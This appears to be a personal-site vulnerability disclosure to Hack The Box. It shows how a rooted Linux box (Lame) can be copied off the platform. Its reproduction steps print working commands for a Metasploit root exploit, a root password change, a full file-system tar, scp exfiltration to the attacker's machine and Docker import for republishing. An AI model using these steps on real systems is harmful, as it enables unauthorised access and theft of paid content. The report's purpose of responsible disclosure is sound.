Home GitHub

Hack The Box - Vulnerability Report

Andrew Campi
05/20/22

Notice of Confidentiality: This document contains a discovered vulnerability that could, if used maliciously, cause harm to the company. The contents of this document are not to be shared or viewed by anyone besides the creator of this document and the intended recipients.
Table of Contents

Executive Summary

Hack The Box is a platform in which security enthusiasts can learn hacking tools/methodologies through hands-on practice. The platform has a collection of virtual machines called boxes that have a hidden, intentional vulnerability. Each virtual machine contains a flag that is found in a directory that only a root user can access. Therefore, the user of the platform completes the box when they have root access to the machine. This is inherently very dangerous. Without any security restrictions in place, a user at this level can do anything they desire with the machine.
To access their full library of boxes, Hack The Box charges a recurring fee. Therefore, Hack The Box’s boxes are valuable, and must remain secure so that they can not be stolen. In Hack The Box’s current state of security, Andrew Campi discovered that a malicious person wanting to steal these boxes has the ability to do so. This vulnerability exists because, once the user of the platform becomes root, they have unrestricted access to the machine.
Andrew Campi discovered this vulnerability specifically on Linux boxes, which comprise the majority of Hack The Box’s paid-for boxes. Once a malicious person roots a box, they can generate a backup tarball of the essential parts of the file system. After changing the password of the machine, the malicious person can then send themselves the backup via SSH. They can then import the backup as a Docker image, and post it to Docker Hub for all to download and use for free.
This vulnerability currently affects all Linux based boxes on Hack The Box’s platform, making it a severe vulnerability. With slight modification to the method described in this report, this vulnerability is likely to exist in Windows boxes as well.
In order to secure their assets, it is recommended that Hack The Box either implements proper restrictions for rooted boxes, or creates an alert system when files are being transferred from the box.

Notice of Intent: Andrew Campi’s only intent is to improve the security posture of Hack The Box. He has absolutely no malicious intent. Andrew will not exploit these vulnerabilities, nor will he publicly expose them. All Hack The Box assets acquired in the included demonstration have been permanently deleted.
Discovered Vulnerability
The following vulnerability is specific to Linux boxes. Slight modifications to the following commands are likely to expose the same vulnerability on all Windows boxes. The vulnerability is rated based on the likelihood that it could cause damage when used.

Forbidden Data Extraction
Severity: Critical
For Linux boxes on the platform, the file system can be extracted. This enables a malicious person to create a Docker image of the box that can be mass distributed for free on Docker Hub.
The following sections use Lame box as an example. In this example, the target IP address of the box is 10.10.10.3. Exchange this IP addresses to reproduce with the desired Linux box on the Hack The Box platform.

Steps to Reproduce:

  1. Connect to Hack The Box’s VPN via OpenVPN.
  2. Turn on the Lame box.
  3. Obtain a root shell on the box. This can be achieved by successful exploitation following an official walkthrough. In this example, the Lame box is rooted using the Metasploit “usermap_script” module. Take note that the exploited ports are 139 and 445. Also, take note that the vulnerable service is Samba.
  4. (On the Lame box as root via Metasploit) Change the password to “hackthebox”.
root@lame:/# passwd Enter new UNIX password: hackthebox Retype new UNIX password: hackthebox
  1. Exit the metasploit shell.
  2. (On the attack box) Connect via SSH.
kali@kali $ ssh root@10.10.10.3 
If an error occurs stating that “ssh-dss” is required, use the following command.
kali@kali $ ssh -oHostKeyAlgorithms=+ssh-dss root@10.10.10.3
  1. (On the Lame box as root via SSH) Generate the backup tarball with defined exclusions.
root@lame:\~# tar -vcpzf backup.tar.gz --exclude=/proc --exclude=/tmp --exclude=/mnt --exclude=/dev --exclude=/sys --exclude=/media /
  1. Exit SSH.
  2. (On the attack box) Copy the backup tarball off the Lame Box onto the attack box.
kali@kali $ scp root@10.10.10.3:/backup.tar.gz /home/kali/Desktop/backups
  1. Change directory to the copied backup tarball (/home/kali/Desktop/backups)
  2. Grant full permissions to the backup tarball.
kali@kali $ sudo chmod 777 backup.tar.gz
  1. (After installing Docker or confirming that it is installed on the attack box) Create a Docker image from the backup tarball. It will be named “lame” with the tag “latest”.
kali@kali $ sudo docker import backup.tar.gz lame:latest 
This docker image can now be pushed to Docker hub for public download. The

following steps demonstrate how to use this Docker image. They demonstrate how to exploit it in the same way as the authentic Lame box.

  1. Create a docker container from the image.
kali@kali $ sudo docker run -dit -p 139:139 -p 445:445 --name=lame lame bash 
The docker container has now opened ports 139 and 445 on the attack box.

However, the vulnerable service is not running yet. A service version scan using
Nmap on these ports will return “tcpwrapped”.

  1. Generate a root shell on the container.
kali@kali $ sudo docker exec -it lame bash
  1. (On the Lame docker container as root) List all services available. Skip this step if the name of the vulnerable service is already known.
root@c2d777ac091b:/# ls -al /etc/init.d/
  1. (On the Lame docker container as root) Start the Samba service.
root@c2d777ac091b:/# service samba start
  1. Exit the Lame Docker container.
  2. (On the attack box) Perform the exact same exploit (metasploit “usermap_script”), this time setting the RHOST to 127.0.0.1 and the LHOST to eth0.